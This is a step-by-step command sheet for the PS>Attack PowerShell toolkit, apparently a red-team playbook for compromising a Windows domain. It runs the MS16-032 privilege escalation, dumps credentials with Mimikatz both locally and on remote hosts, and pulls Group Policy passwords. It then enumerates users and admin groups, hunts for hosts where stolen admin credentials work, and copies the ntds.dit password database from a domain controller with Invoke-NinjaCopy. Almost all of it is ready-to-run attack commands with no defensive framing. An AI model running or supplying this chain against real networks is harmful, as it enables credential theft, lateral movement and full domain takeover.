PS-Attack


PSAttack.exe
Get-Attack <search string>
Get-Attack escalation
Invoke-MS16-032                                   # Should give you a system level command prompt.

PSAttack.exe
Get-Attack mimi
Get-Help Invoke-Mimikatz
Invoke-Mimikatz -DumpCreds
Get-Attack users
Get-NetUser
-----------------------------------------------------------------------------------------------------------------------

Get-GPPPassword                                   # Found a user: lee
Get-Attack "active directory"
Get-Help Get-NetUser
Get-NetUser -UserName lee                         # Member of a security group called LocalAdmin.
Get-Attack groups
Get-Help Get-NetLocalGroup
Get-NetLocalGroup -GroupName "Administrators"     # List everyone in the local Administrators group.		

Restart PS>Attack
Right click on icon > Run as Administrator        # Enter admin creds.
Get-Attack "local admin"
Find-LocalAdminAccess                             # Show other computers where these admin creds have admin access.
Get-Attack find
Get-Help Invoke-UserHunter
Get-Help Invoke-UserHunter -Examples
Invoke-UserHunter -CheckAccess
Get-Help Invoke-Mimikatz
Invoke-Mimikatz -ComputerName <name> -DumpCreds

Restart PS>Attack
Right click on icon > Run as Administrator        # Enter the domain admin creds.
Get-Attack "domain controller"
Get-NetDomainController
Get-Attack copy
Get-Help Invoke-NinjaCopy -Examples
Invoke-NinjaCopy -Path "C:\windows\ntds\ntds.dit" - ComputerName <DC> -LocalDestination "C:\ntds.dit"
ls

